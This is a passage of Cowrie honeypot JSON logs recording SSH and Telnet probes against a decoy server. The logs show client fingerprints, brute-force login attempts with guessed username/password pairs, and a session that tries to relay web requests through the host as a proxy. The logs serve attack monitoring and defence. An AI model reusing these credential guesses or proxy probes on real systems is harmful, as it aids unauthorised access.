":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:05:29.893664Z","src_ip":"212.227.235.229","session":"29bf5cf0e4dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Manhar@123","message":"login attempt [root/Manhar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:05:32.555970Z","src_ip":"212.227.235.229","session":"29bf5cf0e4dc"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:05:33.315563Z","src_ip":"212.227.235.229","session":"29bf5cf0e4dc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56482,"dst_ip":"1.2.3.4","dst_port":22,"session":"0acafb2fbb1c","protocol":"ssh","message":"New connection: 196.251.86.249:56482 (1.2.3.4:22) [session: 0acafb2fbb1c]","sensor":"my-vps","timestamp":"2025-08-26T11:06:23.588377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:06:24.047766Z","src_ip":"196.251.86.249","session":"0acafb2fbb1c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:06:24.048568Z","src_ip":"196.251.86.249","session":"0acafb2fbb1c"}
{"eventid":"cowrie.login.failed","username":"user","password":"123321","message":"login attempt [user/123321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:06:25.441565Z","src_ip":"196.251.86.249","session":"0acafb2fbb1c"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:06:26.969000Z","src_ip":"196.251.86.249","session":"0acafb2fbb1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63246,"dst_ip":"1.2.3.4","dst_port":22,"session":"99affbab8a05","protocol":"ssh","message":"New connection: 212.227.235.229:63246 (1.2.3.4:22) [session: 99affbab8a05]","sensor":"my-vps","timestamp":"2025-08-26T11:06:42.721737Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-26T11:06:42.723145Z","src_ip":"212.227.235.229","session":"99affbab8a05"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:06:42.724071Z","src_ip":"212.227.235.229","session":"99affbab8a05"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56938,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f73d9a6916","protocol":"ssh","message":"New connection: 196.251.86.249:56938 (1.2.3.4:22) [session: 26f73d9a6916]","sensor":"my-vps","timestamp":"2025-08-26T11:07:25.554192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:07:26.142536Z","src_ip":"196.251.86.249","session":"26f73d9a6916"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:07:26.143327Z","src_ip":"196.251.86.249","session":"26f73d9a6916"}
{"eventid":"cowrie.login.failed","username":"user","password":"321123","message":"login attempt [user/321123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:07:27.774019Z","src_ip":"196.251.86.249","session":"26f73d9a6916"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:07:29.044628Z","src_ip":"196.251.86.249","session":"26f73d9a6916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34615,"dst_ip":"1.2.3.4","dst_port":22,"session":"d06327ea1dfc","protocol":"ssh","message":"New connection: 212.227.235.229:34615 (1.2.3.4:22) [session: d06327ea1dfc]","sensor":"my-vps","timestamp":"2025-08-26T11:08:01.283280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T11:08:01.303142Z","src_ip":"212.227.235.229","session":"d06327ea1dfc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T11:08:01.428735Z","src_ip":"212.227.235.229","session":"d06327ea1dfc"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T11:08:01.974794Z","src_ip":"212.227.235.229","session":"d06327ea1dfc"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:08:03.103195Z","src_ip":"212.227.235.229","session":"d06327ea1dfc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52480,"dst_ip":"1.2.3.4","dst_port":22,"session":"4731f042b2f5","protocol":"ssh","message":"New connection: 217.72.205.35:52480 (1.2.3.4:22) [session: 4731f042b2f5]","sensor":"my-vps","timestamp":"2025-08-26T11:08:25.866226Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:08:25.867347Z","src_ip":"217.72.205.35","session":"4731f042b2f5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":57472,"dst_ip":"1.2.3.4","dst_port":22,"session":"713b37aaa3db","protocol":"ssh","message":"New connection: 196.251.86.249:57472 (1.2.3.4:22) [session: 713b37aaa3db]","sensor":"my-vps","timestamp":"2025-08-26T11:08:27.723126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:08:27.724122Z","src_ip":"196.251.86.249","session":"713b37aaa3db"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:08:28.350195Z","src_ip":"196.251.86.249","session":"713b37aaa3db"}
{"eventid":"cowrie.login.failed","username":"user","password":"p@ssw0rd","message":"login attempt [user/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:08:30.262749Z","src_ip":"196.251.86.249","session":"713b37aaa3db"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:08:32.052238Z","src_ip":"196.251.86.249","session":"713b37aaa3db"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58408,"dst_ip":"1.2.3.4","dst_port":22,"session":"77e03871ae26","protocol":"ssh","message":"New connection: 196.251.86.249:58408 (1.2.3.4:22) [session: 77e03871ae26]","sensor":"my-vps","timestamp":"2025-08-26T11:09:27.810994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:09:28.544439Z","src_ip":"196.251.86.249","session":"77e03871ae26"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:09:28.554784Z","src_ip":"196.251.86.249","session":"77e03871ae26"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:09:31.462692Z","src_ip":"196.251.86.249","session":"77e03871ae26"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:09:33.009166Z","src_ip":"196.251.86.249","session":"77e03871ae26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42285,"dst_ip":"1.2.3.4","dst_port":23,"session":"b372ae6b8ac0","protocol":"telnet","message":"New connection: 212.227.235.229:42285 (1.2.3.4:23) [session: b372ae6b8ac0]","sensor":"my-vps","timestamp":"2025-08-26T11:09:54.120944Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":10484,"dst_ip":"1.2.3.4","dst_port":22,"session":"910fad3777df","protocol":"ssh","message":"New connection: 193.105.134.95:10484 (1.2.3.4:22) [session: 910fad3777df]","sensor":"my-vps","timestamp":"2025-08-26T11:10:07.372615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.1.2","message":"Remote SSH version: SSH-2.0-paramiko_2.1.2","sensor":"my-vps","timestamp":"2025-08-26T11:10:07.373738Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T11:10:07.419961Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.341609Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":31222,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:31222","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.387539Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.432755Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":9066,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:9066","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.563642Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.608881Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"193.105.134.95","src_port":31037,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31037","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.739305Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.784763Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"193.105.134.95","src_port":18173,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18173","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.915169Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:08.960203Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"193.105.134.95","src_port":3319,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3319","sensor":"my-vps","timestamp":"2025-08-26T11:10:09.091251Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:09.136017Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"193.105.134.95","src_port":2421,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2421","sensor":"my-vps","timestamp":"2025-08-26T11:10:09.267155Z","session":"910fad3777df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:10:09.311950Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:10:09.357417Z","src_ip":"193.105.134.95","session":"910fad3777df"}
{"eventid":"cowrie.session.closed","duration":20.250508069992065,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:10:14.371376Z","src_ip":"212.227.235.229","session":"b372ae6b8ac0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58632,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dbaa679bd4f","protocol":"ssh","message":"New connection: 196.251.86.249:58632 (1.2.3.4:22) [session: 9dbaa679bd4f]","sensor":"my-vps","timestamp":"2025-08-26T11:10:28.719693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:10:29.340224Z","src_ip":"196.251.86.249","session":"9dbaa679bd4f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:10:29.341044Z","src_ip":"196.251.86.249","session":"9dbaa679bd4f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"654321","message":"login attempt [hadoop/654321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:10:30.956937Z","src_ip":"196.251.86.249","session":"9dbaa679bd4f"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:10:32.583928Z","src_ip":"196.251.86.249","session":"9dbaa679bd4f"}
{"eventid":"cowrie.session.connect","src_ip":"85.209.134.43","src_port":36374,"dst_ip":"1.2.3.4","dst_port":22,"session":"e97e1ae044bc","protocol":"ssh","message":"New connection: 85.209.134.43:36374 (1.2.3.4:22) [session: e97e1ae044bc]","sensor":"my-vps","timestamp":"2025-08-26T11:11:25.839981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T11:11:25.842129Z","src_ip":"85.209.134.43","session":"e97e1ae044bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 